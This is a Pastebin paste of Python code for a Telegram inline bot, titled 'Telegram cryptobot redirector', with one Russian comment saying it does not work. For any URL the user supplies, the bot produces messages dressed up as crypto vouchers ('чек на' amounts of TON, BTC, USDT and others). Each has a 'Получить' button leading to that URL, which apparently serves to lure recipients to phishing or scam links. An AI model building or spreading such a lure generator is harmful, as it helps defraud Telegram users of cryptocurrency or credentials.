Advertisement
sosyamba

Telegram cryptobot redirector

Aug 15th, 2024
482
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.54 KB | None | 0 0
  1. from telegram import InlineQueryResultArticle, InputTextMessageContent, InlineKeyboardButton, InlineKeyboardMarkup
  2. from telegram.ext import Application, InlineQueryHandler
  3.  
  4.  
  5. async def create_article(_id, title, query, crypto):
  6. return InlineQueryResultArticle(
  7. id=f'{query}{_id}{crypto}',
  8. title=title,
  9. input_message_content=InputTextMessageContent(f"<b> чек на {_id / 10} {crypto}</b>", parse_mode='HTML'),
  10. reply_markup=InlineKeyboardMarkup([
  11. [InlineKeyboardButton(title, url=query)]
  12. ])
  13. )
  14.  
  15.  
  16. async def inlinequery(update, context):
  17. try:
  18. query, _id = update.inline_query.query.split()
  19. _id = float(_id)
  20. except:
  21. query = update.inline_query.query
  22. _id = 15
  23.  
  24. tokens = [
  25. "TON",
  26. "BTC",
  27. "NOTCOIN",
  28. "USDT",
  29. "JETTON",
  30. "SCALE"
  31. "XROCK",
  32. "BNB",
  33. "TRX",
  34. "ETH",
  35. ]
  36.  
  37. results = []
  38. for crypto in tokens:
  39. results.append(
  40. await create_article(
  41. _id,
  42. f"Получить {_id / 10} {crypto}",
  43. query,
  44. crypto
  45. )
  46. )
  47.  
  48. await update.inline_query.answer(results)
  49.  
  50.  
  51. def main():
  52. bot_token = "" # Добавьте токен от бота BotFather
  53.  
  54. application = Application.builder().token(bot_token).build()
  55.  
  56. application.add_handler(InlineQueryHandler(inlinequery))
  57.  
  58. application.run_polling()
  59.  
  60.  
  61. if __name__ == '__main__':
  62. main()
Advertisement
Comments
  • Cus_Cus
    113 days
    # text 0.20 KB | 0 0
    1. Собственно говоря ничего не работает нет чёткой инструкции куда вставить этот код и что в нём надо редактировать
    2.  
Add Comment
Please, Sign In to add comment
Advertisement